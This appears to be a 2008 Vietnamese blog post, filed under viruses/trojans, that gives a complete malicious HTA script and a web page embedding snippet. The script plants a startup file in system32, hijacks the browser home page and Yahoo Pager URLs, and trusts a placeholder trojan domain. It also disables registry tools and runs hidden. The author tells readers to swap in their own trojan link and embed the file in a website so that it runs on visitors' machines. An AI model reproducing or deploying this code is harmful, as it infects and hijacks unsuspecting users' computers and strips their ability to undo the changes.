Jun 10, 2008
67 Views

vbscript set homepage hta

Written by

save file với đuôi .hta

<html>
<head>
<script language=”javascript”>
try {
var fso = new ActiveXObject(“Scripting.FileSystemObject”);
var Shell = new ActiveXObject(“WScript.Shell”);
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + “\\system32\\System.js”;
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine(‘var url = “http://troiancuaban.exe”;’);
a2.WriteLine(‘var burl = “http://troiancuaban.exe”;’);
a2.WriteLine(‘var fso = new ActiveXObject(“Scripting.FileSystemObject”);’);
a2.WriteLine(‘var tfolder = fso.GetSpecialFolder(0);’);
a2.WriteLine(‘var filepath = tfolder + “\\\\system32\\\\System.js”;’);
a2.WriteLine(‘var Shell = new ActiveXObject(“WScript.Shell”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\RunOnce\\\\Windows”,filepath);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Run\\\\System32”,filepath);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1”,url);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url2″,”http://http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url3″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url4″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url5″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url6″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url7″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url8″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url9″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url10″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url11″,”http://troiancuaban.exe”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\YMSG R_Calendar\\\\content url”,”http://antihacker.50webs.com/sethome.htm”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\YMSG R_Games\\\\content url”,”http://antihacker.50webs.com/sethome.htm”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\YMSG R_Launchcast\\\\content url”,”http://antihacker.50webs.com/sethome.htm”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\YMSG R_Weather\\\\content url”,”http://antihacker.50webs.com/sethome.htm”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://troiancuaban.exe\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(‘Shell.RegWrite(“HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\Curren tVersion\\\\Policies\\\\System\\\\DisableRegistryT ools”,1,”REG_DWORD”);’);
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />
</head>
<body onload=’window.close()’>
</body>
</html>
<!— <frameset></frameset> –>
[/html]

rồi save lại với tên là : hackervn.hta

nhớ là thay đường dẫn của con trojan đi nha..(http://troiancuaban.exe) là con trojan của tôi

sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:

<center>
<span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span>
<xml id=”oRun”>
<preview>
<view>
<![CDATA[
<object id=”oFile” data=”hackervn.hta?id=1″></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>

Article Tags:
·
Article Categories:
Virut/Trojan
    http://linholiver.com

    https://linholiver.com/diary/about/